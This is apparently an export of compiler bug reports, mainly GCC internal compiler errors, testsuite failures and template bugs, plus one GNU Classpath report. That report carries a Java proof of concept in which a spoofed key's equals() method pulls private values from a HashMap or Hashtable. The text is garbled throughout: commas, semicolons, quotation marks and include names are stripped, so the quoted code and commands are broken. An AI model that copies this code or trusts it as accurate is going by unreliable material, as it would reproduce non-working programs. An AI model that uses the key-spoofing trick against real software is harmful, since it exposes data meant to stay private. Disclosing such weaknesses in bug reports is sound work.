/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.dg/torture/pr48953.c   -O1  (internal compiler error)
FAIL: gcc.dg/torture/pr48953.c   -O1  (test for excess errors)
Excess errors:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
UNRESOLVED: gcc.dg/torture/pr48953.c   -O1  compilation failed to produce executable
Executing on host: /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -B/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/ /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c  -fno-diagnostics-show-caret -fdiagnostics-color=never    -O2  -fno-tree-dce  -lm   -fsanitize=undefined  -o ./pr48953.exe    (timeout = 300)
spawn /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -B/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/ /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -fno-tree-dce -lm -fsanitize=undefined -o ./pr48953.exe
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'main':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'main':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.dg/torture/pr48953.c   -O2  (internal compiler error)
FAIL: gcc.dg/torture/pr48953.c   -O2  (test for excess errors)
Excess errors:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
UNRESOLVED: gcc.dg/torture/pr48953.c   -O2  compilation failed to produce executable
Executing on host: /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -B/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/ /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c  -fno-diagnostics-show-caret -fdiagnostics-color=never    -O3 -g  -fno-tree-dce  -lm   -fsanitize=undefined  -o ./pr48953.exe    (timeout = 300)
spawn /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -B/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/ /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O3 -g -fno-tree-dce -lm -fsanitize=undefined -o ./pr48953.exe
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'main':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'main':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.dg/torture/pr48953.c   -O3 -g  (internal compiler error)
FAIL: gcc.dg/torture/pr48953.c   -O3 -g  (test for excess errors)
Excess errors:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
UNRESOLVED: gcc.dg/torture/pr48953.c   -O3 -g  compilation failed to produce executable
Executing on host: /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -B/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/ /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c  -fno-diagnostics-show-caret -fdiagnostics-color=never    -Os  -fno-tree-dce  -lm   -fsanitize=undefined  -o ./pr48953.exe    (timeout = 300)
spawn /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -B/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/ /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c -fno-diagnostics-show-caret -fdiagnostics-color=never -Os -fno-tree-dce -lm -fsanitize=undefined -o ./pr48953.exe
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'main':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'main':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.dg/torture/pr48953.c   -Os  (internal compiler error)
FAIL: gcc.dg/torture/pr48953.c   -Os  (test for excess errors)
Excess errors:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
UNRESOLVED: gcc.dg/torture/pr48953.c   -Os  compilation failed to produce executable
testcase /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/dg-torture.exp completed in 2 seconds
		=== gcc Summary ===
# of unexpected failures	10
# of unresolved testcases	5
Executing on host: /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -v    (timeout = 300)
spawn /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -v
Using built-in specs.
COLLECT_GCC=/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc
Target: x86_64-apple-darwin15.4.0
Configured with: ./../gcc-6.1.0/configure --prefix=/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0 --enable-languages=cc++
Thread model: posix
gcc version 6.1.0 (GCC) 
------------------------------------------------------------------------
Can anyone confirm this bug?</t>
  </si>
  <si>
    <t>sabrinadfs</t>
  </si>
  <si>
    <t>GCC-70870</t>
  </si>
  <si>
    <t>Segmentation violation in gfc_assign_data_value</t>
  </si>
  <si>
    <t>! gfortran 6.1.0 Segmentation fault in gfc_assign_data_value
      type t
       integer :: g=0   ! default initialization
      end type
      type(t) :: v2
      data v2/t(2)/     ! this is wrong
      end
!f951: internal compiler error: Segmentation fault
!0xa6532f crash_signal
!        ../../gcc-6.1.0/gcc/toplev.c:333
!0x5de1fc gfc_assign_data_value(gfc_expr* gfc_expr* __mpz_struct*
!__mpz_struct (*) [1])
!        ../../gcc-6.1.0/gcc/fortran/data.c:500
!0x651762 check_data_variable
!        ../../gcc-6.1.0/gcc/fortran/resolve.c:14564
!0x651762 traverse_data_var
!        ../../gcc-6.1.0/gcc/fortran/resolve.c:14693
!0x65be91 resolve_data
!        ../../gcc-6.1.0/gcc/fortran/resolve.c:14748
!0x65be91 resolve_types
!        ../../gcc-6.1.0/gcc/fortran/resolve.c:15501
!0x6576bf gfc_resolve(gfc_namespace*)
!        ../../gcc-6.1.0/gcc/fortran/resolve.c:15586
!0x642eda resolve_all_program_units
!        ../../gcc-6.1.0/gcc/fortran/parse.c:5552
!0x642eda gfc_parse_file()
!        ../../gcc-6.1.0/gcc/fortran/parse.c:5804
!0x684135 gfc_be_parse_file
!        ../../gcc-6.1.0/gcc/fortran/f95-lang.c:201
!Please submit a full bug report
!with preprocessed source if appropriate.
!Please include the complete backtrace with any bug report.
!See  for instructions.</t>
  </si>
  <si>
    <t>GCC-9754</t>
  </si>
  <si>
    <t>Error for legal template specialization</t>
  </si>
  <si>
    <t>g++ 3.2.2 refuses to compile the template specialization
in the attached source file.
Transcript of compilation:
----------------------------
g++3 -v -c specialization.cc
Reading specs from /home/team02/jakan/gnu/lib/gcc-lib/sparc-sun-solaris2.8/3.2.2/specs
Configured with: ../gcc-3.2.2/configure --prefix=/home/team02/jakan/gnu --program-suffix=3 --enable-threads=posix
Thread model: posix
gcc version 3.2.2
 /home/team02/jakan/gnu/lib/gcc-lib/sparc-sun-solaris2.8/3.2.2/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=2 -D__GXX_ABI_VERSION=102 -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -D__sparc -D__sun -D__unix -Asystem=unix -Asystem=svr4 -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_XOPEN_SOURCE=500 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -D__EXTENSIONS__ -D__SIZE_TYPE__=unsigned int -D__PTRDIFF_TYPE__=int -D__WCHAR_TYPE__=long int -D__WINT_TYPE__=long int -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc specialization.cc -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -quiet -dumpbase specialization.cc -version -o /var/tmp//ccOwZj0R.s
GNU CPP version 3.2.2 (cpplib) (sparc ELF)
GNU C++ version 3.2.2 (sparc-sun-solaris2.8)
	compiled by GNU C version 3.2.2.
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /home/team02/jakan/gnu/sparc-sun-solaris2.8/include
#include ... search starts here:
#include  search starts here:
 /home/team02/jakan/gnu/include/c++/3.2.2
 /home/team02/jakan/gnu/include/c++/3.2.2/sparc-sun-solaris2.8
 /home/team02/jakan/gnu/include/c++/3.2.2/backward
 /home/team02/jakan/gnu/include
 /home/team02/jakan/gnu/lib/gcc-lib/sparc-sun-solaris2.8/3.2.2/include
 /usr/include
End of search list.
specialization.cc:21: template-id `S' for `S::S(int)' does not match any 
   template declaration
specialization.cc:21: syntax error before `{' token
Release:
3.2.2
Environment:
054@~/tmp/gcc3 (337): uname -a
SunOS padev054 5.8 Generic_108528-13 sun4u sparc SUNWUltra-5_10</t>
  </si>
  <si>
    <t>jkanze</t>
  </si>
  <si>
    <t>GCC-5448</t>
  </si>
  <si>
    <t>gcc emits internal error (unrecognized insn)</t>
  </si>
  <si>
    <t>Ice happens with gcc while this code compiles fine with tc 3.0 dos e.g.
config.c: In function `init_config':
config.c:106: Unrecognizable insn:
(insn 188 185 190 (set (reg:SI 58)
        (not:SI (symbol_ref:SI (sCfgFileLine)))) -1 (nil)
    (nil))
config.c:106: Internal compiler error in extract_insn at recog.c:2210
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
Reading specs from /usr/local/lib/gcc-lib/i586-pc-linux-gnu/3.0/specs Configured with: ./configure  : (reconfigured) ./configure --enable-languages=cc++ Thread model: single gcc version 3.0
Environment:
Linux nausicaa.localdomain 2.4.13 #10 dim dec 2 17:55:18 CET 2001 i586 unknown
How-To-Repeat:
gcc -c config.i will produce the error everytime.</t>
  </si>
  <si>
    <t>ojolly</t>
  </si>
  <si>
    <t>GCC-57610</t>
  </si>
  <si>
    <t>Reference initialized with temporary instead of sub-object of conversion result</t>
  </si>
  <si>
    <t>o_kniemeyer</t>
  </si>
  <si>
    <t>GCC-78970</t>
  </si>
  <si>
    <t>GCC crashes if input file is dash</t>
  </si>
  <si>
    <t>GCC with an input file as hyphen crashes when it tries to process a C/C++ header. But it perfectly works if the argument is a normal file name (even link `/dev/stdin`).
mymedia@comp2:/tmp/tmp.kRcQNR9Tky$ ls -A
test.h
mymedia@comp2:/tmp/tmp.kRcQNR9Tky$ cat test.h 
#include 
mymedia@comp2:/tmp/tmp.kRcQNR9Tky$ /usr/lib/gcc-snapshot/bin/gcc -x c-header -o /dev/null test.h 
mymedia@comp2:/tmp/tmp.kRcQNR9Tky$ /usr/lib/gcc-snapshot/bin/gcc -x c-header -o /dev/null /dev/stdin &lt;test.h 
mymedia@comp2:/tmp/tmp.kRcQNR9Tky$ /usr/lib/gcc-snapshot/bin/gcc -x c-header -o /dev/null - &lt;test.h 
:1:0: internal compiler error: Segmentation fault
0xb7364f crash_signal
	../../src/gcc/toplev.c:333
0x13f275b md5_stream
	../../src/libiberty/md5.c:158
0x13bcc9d _cpp_save_file_entries
	../../src/libcpp/files.c:1889
0x13cb44f cpp_write_pch_state(cpp_reader* _IO_FILE*)
	../../src/libcpp/pch.c:383
0x6c0cce c_common_write_pch()
	../../src/gcc/c-family/c-pch.c:186
0x6c0857 c_common_parse_file()
	../../src/gcc/c-family/c-opts.c:1103
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
mymedia@comp2:/tmp/tmp.kRcQNR9Tky$ /usr/lib/gcc-snapshot/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/usr/lib/gcc-snapshot/bin/gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 20161231-1ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cadac++gofortranobjcobj-c++ --prefix=/usr/lib/gcc-snapshot --program-prefix= --enable-shared --enable-linker-build-id --disable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --enable-objc-gc=auto --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 7.0.0 20161231 (experimental) [trunk revision 243987] (Ubuntu 20161231-1ubuntu1) 
mymedia@comp2:/tmp/tmp.kRcQNR9Tky$</t>
  </si>
  <si>
    <t>guriev-ns</t>
  </si>
  <si>
    <t>GCC-45176</t>
  </si>
  <si>
    <t>restrict qualifier is not used in a manually unrolled loop</t>
  </si>
  <si>
    <t>void foo (int * restrict a int * restrict b int * restrict c)
{
   int i
   for(i = 0 i &lt; 100 i+=4)
     {
       a[i] = b[i] * c[i]
       a[i+1] = b[i+1] * c[i+1]
       a[i+2] = b[i+2] * c[i+2]
       a[i+3] = b[i+3] * c[i+3]
     }
}   
Trunk x86-64 compiler (162821) produces code that later load instructions are not scheduled before the previous store instructions as expected. Clearly restrict qualifier is not used here. 
 ~/work/install-x86/bin/gcc tst3.c -O2 -S -std=c99 -da -fschedule-insns -frename-registers
.L2:
	movl	(%rdx%rax) %r10d
	imull	(%rsi%rax) %r10d
	movl	%r10d (%rdi%rax)
	movl	4(%rdx%rax) %r9d
	imull	4(%rsi%rax) %r9d
	movl	%r9d 4(%rdi%rax)
	movl	8(%rdx%rax) %r8d
	imull	8(%rsi%rax) %r8d
	movl	%r8d 8(%rdi%rax)
	movl	12(%rdx%rax) %ecx
	imull	12(%rsi%rax) %ecx
	movl	%ecx 12(%rdi%rax)
	addq	$16 %rax
	cmpq	$400 %rax
Richard has a patch and it seems to work for this example. 
Index: expr.c
===================================================================
--- expr.c      (revision 162841)
+++ expr.c      (working copy)
@@ -86657 +86657 @@ expand_expr_real_1 (tree exp rtx target
        set_mem_addr_space (temp as)
        base = get_base_address (TMR_ORIGINAL (exp))
        if (base
-           &amp;&amp; INDIRECT_REF_P (base)
+           &amp;&amp; (INDIRECT_REF_P (base) || TREE_CODE (base) == MEM_REF)
            &amp;&amp; TMR_BASE (exp)
            &amp;&amp; TREE_CODE (TMR_BASE (exp)) == SSA_NAME
            &amp;&amp; POINTER_TYPE_P (TREE_TYPE (TMR_BASE (exp))))
The code generated:
.L2:
	movl	(%rdx%rax) %r10d
	movl	4(%rdx%rax) %r9d
	imull	(%rsi%rax) %r10d
	imull	4(%rsi%rax) %r9d
	movl	8(%rdx%rax) %r8d
	movl	12(%rdx%rax) %ecx
	imull	8(%rsi%rax) %r8d
	imull	12(%rsi%rax) %ecx
	movl	%r10d (%rdi%rax)
	movl	%r9d 4(%rdi%rax)
	movl	%r8d 8(%rdi%rax)
	movl	%ecx 12(%rdi%rax)
	addq	$16 %rax
	cmpq	$400 %rax
	jne	.L2</t>
  </si>
  <si>
    <t>GCC-32723</t>
  </si>
  <si>
    <t>[4.2 Regression] memory hog in solve_graph</t>
  </si>
  <si>
    <t>with the attached test case solve_graph makes memory consumptation goes higher than 1GB whereas it compiles fine with &lt;50MB on gcc 4.1 and 4.3
the test case was created from tomoe-dict-unihan.c
(https://sourceforge.jp/projects/tomoe/) which uses 11MB .h data file</t>
  </si>
  <si>
    <t>pixel</t>
  </si>
  <si>
    <t>CLASSPATH-25727</t>
  </si>
  <si>
    <t>Hashtable is not secure</t>
  </si>
  <si>
    <t>It might be a secret but Sun's implementation of Hashtable will ask the currently existing key in a Hashtable if it is equal to the queried key instead of the otherway around. Anyone who knows this secret can depend on using a backing hashtable to allow public and private values without worring about evil code accessing the private values. This can be seen in JComponent.getClientObject where I assume values are put there that Sun does not want unsecure code access to.
I think the Hotspot can probably better optmise a HashMap since the same equals method will get run over and over which is why this secure feature would only be in Hashtable.
Code example:
import java.util.HashMap
import java.util.Hashtable
import java.util.Map
public class HashMapVTable {
	public static void main(String[] args)
	{
		HashMap hashMap = new HashMap()
		testMap(hashMapHashMap)
		Hashtable hashtable = new Hashtable()
		testMap(hashtableHashtable)
	}
	public static void testMap(Map mapString name)
	{
		SecureKey secureKey = new SecureKey(MyKey)
		Object data = new Object()
		map.put(secureKeydata)
		FakeKey fakeKey = new FakeKey(MyKey)
		boolean gotData = map.get(fakeKey) == data
		if(gotData)
			System.out.println(name+ is vulnerable)
		else
			System.out.println(name+ is not vulnerable)
	}
	private static class SecureKey
	{
		private String name
		public SecureKey(String name)
		{
			this.name = name
		}
		@Override
		public int hashCode() {
			return name.hashCode()
		}
		@Override
		public boolean equals(Object obj) {
			return obj == this
		}
		public String getName()
		{
			return name
		}
	}
	private static class FakeKey
	{
		private String name
		public FakeKey(String name)
		{
			this.name = name
		}
		@Override
		public int hashCode() {
			return name.hashCode()
		}
		@Override
		public boolean equals(Object obj) {
			return obj instanceof SecureKey 
		}
	}
}
The output is:
Sun:
HashMap is vulnerable
Hashtable is not vulnerable
ClassPath:
HashMap is vulnerable
Hashtable is vulnerable</t>
  </si>
  <si>
    <t>subanark</t>
  </si>
  <si>
    <t>GCC-6527</t>
  </si>
  <si>
    <t>g++ 3.1: class member dtor order wrong (regression in past week)</t>
  </si>
  <si>
    <t>The C++ standard specifies that for class members and bases destructors
are to be called in the reverse of the order in which the constructors
were called.  gcc used to do this but the present cvs version of 3.1
calls the destructors in the _same_ order as the constructors.
This is demonstrated by the example below:
$ g++ -o x x.cc
$ ./x
ctor 3
ctor 1
ctor 2
dtor 3
dtor 1
If i compile this with gcc 2.95 instead i get this output instead:
ctor 3
ctor 1
ctor 2
dtor 2
dtor 1
dtor 3
Release:
3.1 20020429 (prerelease)
Environment:
System: Linux karma 2.4.9-13 #1 Tue Oct 30 20:11:04 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix --enable-long-long --enable-languages=cc++f77
How-To-Repeat:
-- x.cc ---------------------------------------------------------------
extern C int printf(...)
struct B
{
  int x
  B (int i) : x (i) { printf (ctor %d\n x) }
  ~B () { printf (dtor %d\n x) }
}
struct A
  : public B
{
  A () : B (3) x1(1) x2(2) {}
  B x1
  B x2
}
int main ()
{
  A a
  return 0
}
-----------------------------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-18986</t>
  </si>
  <si>
    <t>GCC Manual does not specify standard for C++</t>
  </si>
  <si>
    <t>Section 2 of the GCC manual details the standards followed for each language 
supported by gcc. Notably absent is any reference for the C++ language.
I assume the basic answer is ISO/IEC 14882-1998. What about Technical 
Corrigendum 1 (TC1) is that also supported? Further I note that several DRs 
which are not part of TC1 are currently supported by 3.4.3 (for example DR45 
and DR77). Since these DRs are at WP status they are not officially part of 
the ISO standard. Therefore they should at least be seperately listed so that 
users and maintainers alike know what language is being supported. Better yet 
a flag (ala C -ansi) should be available to disable DRs which are not part of 
the standard.</t>
  </si>
  <si>
    <t>llewins</t>
  </si>
  <si>
    <t>GCC-55661</t>
  </si>
  <si>
    <t>options summary lists -fsanitize in wrong section</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/onlinedocs/gcc/Option-Summary.html lists -fsanitize=style under
Options for Debugging Your Program or GCC but it's actually documented under Options that Control Optimization at http://gcc.gnu.org/onlinedocs/gcc/Optimize-Options.html</t>
  </si>
  <si>
    <t>GCC-3938</t>
  </si>
  <si>
    <t>missing structure member</t>
  </si>
  <si>
    <t>make[1]: Entering directory `/usr/src/redhat/BUILD/insight+dejagnu-20010804/gdb'
gcc -c -O2 -fsigned-char    -I. -I. -I./config -DHAVE_CONFIG_H -I./../include/op
code -I./../readline/.. -I../bfd -I./../bfd  -I./../include -I../intl -I./../int
l  -DMI_OUT=1 -DGDBTK -DUI_OUT=1 -Wimplicit -Wreturn-type -Wcomment -Wtrigraphs 
-Wformat -Wparentheses -Wpointer-arith -Wuninitialized  -I./../libgui/src  -I/us
r/src/redhat/BUILD/insight+dejagnu-20010804/itcl/itcl/generic \
-I/usr/src/redhat/BUILD/insight+dejagnu-20010804/tix/generic -I/usr/src/redhat/B
UILD/insight+dejagnu-20010804/tcl/generic -I/usr/src/redhat/BUILD/insight+dejagn
u-20010804/tk/generic -I/usr/src/redhat/BUILD/insight+dejagnu-20010804/tk/generi
c -I/usr/X11R6/include   \
 ./gdbtk/generic/gdbtk-bp.c \
-DGDBTK_LIBRARY=\/usr/share/gdbtcl\
gdbtk/generic/gdbtk-bp.c: In function `gdb_get_breakpoint_info':
gdbtk/generic/gdbtk-bp.c:346: structure has no member named `enable'
gdbtk/generic/gdbtk-bp.c:346: `enabled' undeclared (first use in this function)
gdbtk/generic/gdbtk-bp.c:346: (Each undeclared identifier is reported only once
gdbtk/generic/gdbtk-bp.c:346: for each function it appears in.)
gdbtk/generic/gdbtk-bp.c: In function `gdb_set_bp':
gdbtk/generic/gdbtk-bp.c:459: `del' undeclared (first use in this function)
gdbtk/generic/gdbtk-bp.c:461: `donttouch' undeclared (first use in this function
)
gdbtk/generic/gdbtk-bp.c:434: warning: `disp' might be used uninitialized in thi
s function
gdbtk/generic/gdbtk-bp.c: In function `gdb_set_bp_addr':
gdbtk/generic/gdbtk-bp.c:541: `del' undeclared (first use in this function)
gdbtk/generic/gdbtk-bp.c:543: `donttouch' undeclared (first use in this function
)
gdbtk/generic/gdbtk-bp.c:520: warning: `disp' might be used uninitialized in thi
s function
gdbtk/generic/gdbtk-bp.c: In function `gdb_get_tracepoint_info':
gdbtk/generic/gdbtk-bp.c:820: structure has no member named `enabled'
make[1]: *** [gdbtk-bp.o] Error 1
make[1]: Leaving directory `/usr/src/redhat/BUILD/insight+dejagnu-20010804/gdb'
make: *** [all-gdb] Error 2
[root@g4mpKFUKUI insight+dejagnu-20010804]# gcc -v
Reading specs from /usr/lib/gcc-lib/ppc-linux/3.0.1/specs
Configured with: /usr/src/redhat/BUILD/gcc-3.0.1/configure --prefix=/usr --mandir=/usr/share/man --info
dir=/usr/share/info --enable-shared --enable-threads --enable-checking=gcmisctree --enable-languages=
cc++f77objc ppc-linux
Thread model: posix
gcc version 3.0.1 20010802 (prerelease)
[root@g4mpKFUKUI insight+dejagnu-20010804]# 
-------------------- gdbtk.c --------------------------------
  Tcl_ListObjAppendElement (NULL result_ptr-&gt;obj_ptr
			    Tcl_NewBooleanObj (b-&gt;enable == enabled))
  if (strncmp (typestr temp 4) == 0)
    disp = del
  else if (strncmp (typestr normal 6) == 0)
    disp = donttouch
  else
    {
      Tcl_SetStringObj (result_ptr-&gt;obj_ptr
			type must be \temp\ or \normal\ -1)
      return TCL_ERROR
    }
Release:
gcc-3.0.1 cvs
Environment:
linuxppc
How-To-Repeat:
compiling insight+dejagnu-20010804</t>
  </si>
  <si>
    <t>GCC-53540</t>
  </si>
  <si>
    <t>C++11: using fails to be equivalent to typedef</t>
  </si>
  <si>
    <t>Created attachment 27532
test case
Hi all
I hope this is not a bogus bug report I apologize if there is something I misunderstood.  I observed the following with both 4.7.0 and 4.8:
g++-mp-4.7 (MacPorts gcc47 4.7.0_3) 4.7.0
Copyright (C) 2012 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
g++-mp-4.8 (MacPorts gcc48 4.8-20120527_1) 4.8.0 20120527 (experimental)
Copyright (C) 2012 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
In the following example I import a type name from a templates struct with using and do the same with typedef.  The latter works but using does not seem to find the definition.  clang finds it though (but then again my understanding might be wrong).
If function is not templated there is no problem.
$ cat foo.cc
template 
struct context
{
  typedef int type
}
template 
void function()
{
  using ctx1 = context
  typename ctx1::type f1
  typedef context ctx2
  typename ctx2::type f2
}
int main()
{
  function()
}
$ g++-mp-4.8 -Wall -std=c++11 foo.cc
foo.cc: In instantiation of 'void function() [with T = int]':
foo.cc:19:17:   required from here
foo.cc:11:23: error: no type named 'type' in 'using ctx1 = struct context'
   typename ctx1::type f1
                       ^
foo.cc:14:23: warning: unused variable 'f2' [-Wunused-variable]
   typename ctx2::type f2
                       ^</t>
  </si>
  <si>
    <t>akim.demaille</t>
  </si>
  <si>
    <t>GCC-27425</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 regression] ICE with invalid template-template-parameter</t>
  </si>
  <si>
    <t>The C++ frontend ICEs on the following invalid code snippet since GCC 3.4.0:
==================================================
template struct A
{
    template class&gt; struct B {}
    template struct C
    B b
}
A a
==================================================
bugB.cc:3: error: 'void' is not a valid type for a template constant parameter
bugB.cc:4: error: 'void' is not a valid type for a template constant parameter
bugB.cc: In instantiation of 'A':
bugB.cc:8:   instantiated from here
bugB.cc:3: error: 'void' is not a valid type for a template constant parameter
bugB.cc:4: error: 'void' is not a valid type for a template constant parameter
bugB.cc:4: error: 'void' is not a valid type for a template constant parameter
bugB.cc:5: internal compiler error: in coerce_template_parms at cp/pt.c:4042
Please submit a full bug report [etc.]
With GCC 3.3.3 - 3.3.6 we got sensible error messages.
Before GCC 3.3.3 the compiler entered an infinite loop.</t>
  </si>
  <si>
    <t>GCC-2701</t>
  </si>
  <si>
    <t>boost: constructor called twice (gcc-2.95 regression)</t>
  </si>
  <si>
    <t>The following source code t.C extracted from the file
libs/random/random_test.cpp from the boost 1.21.2 repository 
causes a segmentation fault when run if compiled by gcc 3.1. If the
code is compiled by gcc 2.95.2 the program runs as expected. Further
analysis shows that the code compiled by gcc 3.1 calls the
uniform_smallint constructor twice the _factor variable wraps
around it is set to zero causing a division by zero
floating point exception in line 87 (result_type operator()() of the
class class uniform_smallint). I believe that is a regression from gcc
2.95.2.
Release:
3.1 20010428 (experimental)
Environment:
System: Linux kiste 2.4.3 #35 Sat Mar 31 22:08:25 CEST 2001 i686 unknown
Architecture: i686
SuSE 7.1
Glibc 2.2
GNU ld version 2.11.90.0.4 (with BFD 2.11.90.0.4)
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
How-To-Repeat:
Source code t.C
#include 
extern C int printf (const char * ...)
namespace std {
    template struct numeric_limits {
        static const bool is_specialized = false
        static _Tp max() throw() { return static_cast(0) }
    }
    template struct numeric_limits {
